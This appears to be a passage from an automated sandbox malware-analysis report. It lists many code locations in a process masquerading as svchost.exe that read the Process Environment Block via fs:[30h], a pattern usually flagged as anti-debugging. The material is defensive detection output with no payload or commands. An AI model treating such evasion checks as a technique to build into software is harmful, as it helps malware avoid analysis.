                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B2349 mov eax, dword ptr fs:[00000030h]3_2_038B2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov ecx, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B035C mov eax, dword ptr fs:[00000030h]3_2_038B035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038FA352 mov eax, dword ptr fs:[00000030h]3_2_038FA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D8350 mov ecx, dword ptr fs:[00000030h]3_2_038D8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D437C mov eax, dword ptr fs:[00000030h]3_2_038D437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0386E284 mov eax, dword ptr fs:[00000030h]3_2_0386E284
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B0283 mov eax, dword ptr fs:[00000030h]3_2_038B0283
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402A0 mov eax, dword ptr fs:[00000030h]3_2_038402A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov ecx, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C62A0 mov eax, dword ptr fs:[00000030h]3_2_038C62A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383A2C3 mov eax, dword ptr fs:[00000030h]3_2_0383A2C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038402E1 mov eax, dword ptr fs:[00000030h]3_2_038402E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382823B mov eax, dword ptr fs:[00000030h]3_2_0382823B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov eax, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B8243 mov ecx, dword ptr fs:[00000030h]3_2_038B8243
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A250 mov eax, dword ptr fs:[00000030h]3_2_0382A250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836259 mov eax, dword ptr fs:[00000030h]3_2_03836259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EA250 mov eax, dword ptr fs:[00000030h]3_2_038EA250
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03834260 mov eax, dword ptr fs:[00000030h]3_2_03834260
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382826B mov eax, dword ptr fs:[00000030h]3_2_0382826B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E0274 mov eax, dword ptr fs:[00000030h]3_2_038E0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03870185 mov eax, dword ptr fs:[00000030h]3_2_03870185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038EC188 mov eax, dword ptr fs:[00000030h]3_2_038EC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D4180 mov eax, dword ptr fs:[00000030h]3_2_038D4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B019F mov eax, dword ptr fs:[00000030h]3_2_038B019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A197 mov eax, dword ptr fs:[00000030h]3_2_0382A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F61C3 mov eax, dword ptr fs:[00000030h]3_2_038F61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov ecx, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038AE1D0 mov eax, dword ptr fs:[00000030h]3_2_038AE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_039061E5 mov eax, dword ptr fs:[00000030h]3_2_039061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038601F8 mov eax, dword ptr fs:[00000030h]3_2_038601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov eax, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DE10E mov ecx, dword ptr fs:[00000030h]3_2_038DE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov ecx, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038DA118 mov eax, dword ptr fs:[00000030h]3_2_038DA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F0115 mov eax, dword ptr fs:[00000030h]3_2_038F0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03860124 mov eax, dword ptr fs:[00000030h]3_2_03860124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov ecx, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C4144 mov eax, dword ptr fs:[00000030h]3_2_038C4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C156 mov eax, dword ptr fs:[00000030h]3_2_0382C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C8158 mov eax, dword ptr fs:[00000030h]3_2_038C8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03836154 mov eax, dword ptr fs:[00000030h]3_2_03836154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383208A mov eax, dword ptr fs:[00000030h]3_2_0383208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C80A8 mov eax, dword ptr fs:[00000030h]3_2_038C80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov eax, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038F60B8 mov ecx, dword ptr fs:[00000030h]3_2_038F60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B20DE mov eax, dword ptr fs:[00000030h]3_2_038B20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A0E3 mov ecx, dword ptr fs:[00000030h]3_2_0382A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038380E9 mov eax, dword ptr fs:[00000030h]3_2_038380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B60E0 mov eax, dword ptr fs:[00000030h]3_2_038B60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C0F0 mov eax, dword ptr fs:[00000030h]3_2_0382C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038720F0 mov ecx, dword ptr fs:[00000030h]3_2_038720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B4000 mov ecx, dword ptr fs:[00000030h]3_2_038B4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D2000 mov eax, dword ptr fs:[00000030h]3_2_038D2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0384E016 mov eax, dword ptr fs:[00000030h]3_2_0384E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382A020 mov eax, dword ptr fs:[00000030h]3_2_0382A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0382C020 mov eax, dword ptr fs:[00000030h]3_2_0382C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038C6030 mov eax, dword ptr fs:[00000030h]3_2_038C6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_03832050 mov eax, dword ptr fs:[00000030h]3_2_03832050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B6050 mov eax, dword ptr fs:[00000030h]3_2_038B6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0385C073 mov eax, dword ptr fs:[00000030h]3_2_0385C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038D678E mov eax, dword ptr fs:[00000030h]3_2_038D678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038307AF mov eax, dword ptr fs:[00000030h]3_2_038307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038E47A0 mov eax, dword ptr fs:[00000030h]3_2_038E47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_0383C7C0 mov eax, dword ptr fs:[00000030h]3_2_0383C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038B07C3 mov eax, dword ptr fs:[00000030h]3_2_038B07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038527ED mov eax, dword ptr fs:[00000030h]3_2_038527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038BE7E1 mov eax, dword ptr fs:[00000030h]3_2_038BE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 3_2_038347FB mov eax, dword ptr fs:[00000030h]3_2_038347FB
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C700 mov eax, dword ptr fs:[00000030h] | 3_2_0386C700
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830710 mov eax, dword ptr fs:[00000030h] | 3_2_03830710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03860710 mov eax, dword ptr fs:[00000030h] | 3_2_03860710
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h] | 3_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C720 mov eax, dword ptr fs:[00000030h] | 3_2_0386C720
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386273C mov eax, dword ptr fs:[00000030h] | 3_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386273C mov ecx, dword ptr fs:[00000030h] | 3_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386273C mov eax, dword ptr fs:[00000030h] | 3_2_0386273C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AC730 mov eax, dword ptr fs:[00000030h] | 3_2_038AC730
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386674D mov esi, dword ptr fs:[00000030h] | 3_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386674D mov eax, dword ptr fs:[00000030h] | 3_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386674D mov eax, dword ptr fs:[00000030h] | 3_2_0386674D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03830750 mov eax, dword ptr fs:[00000030h] | 3_2_03830750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038BE75D mov eax, dword ptr fs:[00000030h] | 3_2_038BE75D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03872750 mov eax, dword ptr fs:[00000030h] | 3_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03872750 mov eax, dword ptr fs:[00000030h] | 3_2_03872750
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B4755 mov eax, dword ptr fs:[00000030h] | 3_2_038B4755
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03838770 mov eax, dword ptr fs:[00000030h] | 3_2_03838770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03840770 mov eax, dword ptr fs:[00000030h] | 3_2_03840770
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03834690 mov eax, dword ptr fs:[00000030h] | 3_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03834690 mov eax, dword ptr fs:[00000030h] | 3_2_03834690
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386C6A6 mov eax, dword ptr fs:[00000030h] | 3_2_0386C6A6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038666B0 mov eax, dword ptr fs:[00000030h] | 3_2_038666B0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A6C7 mov ebx, dword ptr fs:[00000030h] | 3_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A6C7 mov eax, dword ptr fs:[00000030h] | 3_2_0386A6C7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h] | 3_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h] | 3_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h] | 3_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE6F2 mov eax, dword ptr fs:[00000030h] | 3_2_038AE6F2
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h] | 3_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B06F1 mov eax, dword ptr fs:[00000030h] | 3_2_038B06F1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038AE609 mov eax, dword ptr fs:[00000030h] | 3_2_038AE609
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384260B mov eax, dword ptr fs:[00000030h] | 3_2_0384260B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03872619 mov eax, dword ptr fs:[00000030h] | 3_2_03872619
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384E627 mov eax, dword ptr fs:[00000030h] | 3_2_0384E627
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03866620 mov eax, dword ptr fs:[00000030h] | 3_2_03866620
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03868620 mov eax, dword ptr fs:[00000030h] | 3_2_03868620
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0383262C mov eax, dword ptr fs:[00000030h] | 3_2_0383262C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0384C640 mov eax, dword ptr fs:[00000030h] | 3_2_0384C640
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F866E mov eax, dword ptr fs:[00000030h] | 3_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038F866E mov eax, dword ptr fs:[00000030h] | 3_2_038F866E
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h] | 3_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A660 mov eax, dword ptr fs:[00000030h] | 3_2_0386A660
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03862674 mov eax, dword ptr fs:[00000030h] | 3_2_03862674
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03832582 mov eax, dword ptr fs:[00000030h] | 3_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03832582 mov ecx, dword ptr fs:[00000030h] | 3_2_03832582
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_03864588 mov eax, dword ptr fs:[00000030h] | 3_2_03864588
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E59C mov eax, dword ptr fs:[00000030h] | 3_2_0386E59C
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h] | 3_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h] | 3_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038B05A7 mov eax, dword ptr fs:[00000030h] | 3_2_038B05A7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h] | 3_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038545B1 mov eax, dword ptr fs:[00000030h] | 3_2_038545B1
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h] | 3_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386E5CF mov eax, dword ptr fs:[00000030h] | 3_2_0386E5CF
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_038365D0 mov eax, dword ptr fs:[00000030h] | 3_2_038365D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h] | 3_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0386A5D0 mov eax, dword ptr fs:[00000030h] | 3_2_0386A5D0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 3_2_0385E5E7 mov eax, dword ptr fs:[00000030h] | 3_2_0385E5E7
